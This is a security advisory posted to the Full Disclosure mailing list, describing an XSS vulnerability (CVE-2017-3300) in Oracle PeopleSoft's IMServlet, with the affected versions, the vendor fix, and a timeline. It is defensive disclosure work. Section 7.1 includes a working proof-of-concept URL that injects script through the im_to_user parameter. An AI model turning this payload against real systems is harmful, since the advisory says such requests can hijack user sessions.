
Date: Mon, 23 Jan 2017 16:45:44 +0300
From: ERPScan inc <erpscan.online@...il.com>
To: submissions@...ketstormsecurity.com, fulldisclosure@...lists.org, 
 pen-test@...urityfocus.com, bugs@...uritytracker.com, 
 bugtraq@...urityfocus.com
Subject: [FD] [ERPSCAN-17-005] Oracle PeopleSoft - XSS vulnerability
	CVE-2017-3300

Application: Oracle PeopleSoft

Vendor: Oracle

Bugs: XXS

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Authors: Vahagn Vardanyan, Dmitry Yudin



1. ADVISORY INFORMATION

Title: Oracle PeopleSoft – XSS vulnerability

Advisory ID: [ERPSCAN-17-005]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle



2. VULNERABILITY INFORMATION

Class: XSS [CWE-79]

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2017-3300

CVSS Base Score: 6.1



3. VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of
administrators or users.



4. VULNERABLE PACKAGES


$ psreleaseinfo

ToolsRelease: 8.55.03

ToolsReleaseDB: 8.55



PeopleSoft HCM 9.2



PORTAL.war/WEB-INF/lib/mcfIM.jar



$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar

36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar



5. SOLUTIONS AND WORKAROUNDS

Oracle CPU January 2017


6. AUTHOR


Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13 )/ERPScan



7. TECHNICAL DESCRIPTION



7.1. Proof of Concept



xss


http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E



8. REPORT TIMELINE

Reported:  31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017



9. REFERENCES

http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and analysis of
critical enterprise applications. It was acknowledged multiple times by the
largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for
discovering more than 400 vulnerabilities in their solutions (200 of them
just in SAP!).

ERPScan researchers are proud of discovering new types of vulnerabilities
(TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug"
nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at 60+
prime international security conferences in 25+ countries across the
continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for
several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP security
researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters, Yahoo, SC
Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in various
fields of cybersecurity (from web application to ICS/SCADA systems),
gathering their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally and
enables large Oil and Gas, Financial, Retail and other organizations to
secure their mission-critical processes. Named as an ‘Emerging Vendor’ in
Security by CRN, listed among “TOP 100 SAP Solution providers” and
distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in
discovering and resolving security vulnerabilities. ERPScan consultants
work with SAP SE in Walldorf to assist in improving the security of their
latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and secure
SAP and Oracle ERP systems and business-critical applications from both
cyberattacks and internal fraud. As a rule, our clients are large
enterprises, Fortune 2000 companies and MSPs, whose requirements are to
actively monitor and manage security of vast SAP and Oracle landscapes on a
global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and Amsterdam,
to provide threat intelligence services, continuous support and to operate
local offices and partner network spanning 20+ countries around the globe.



Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/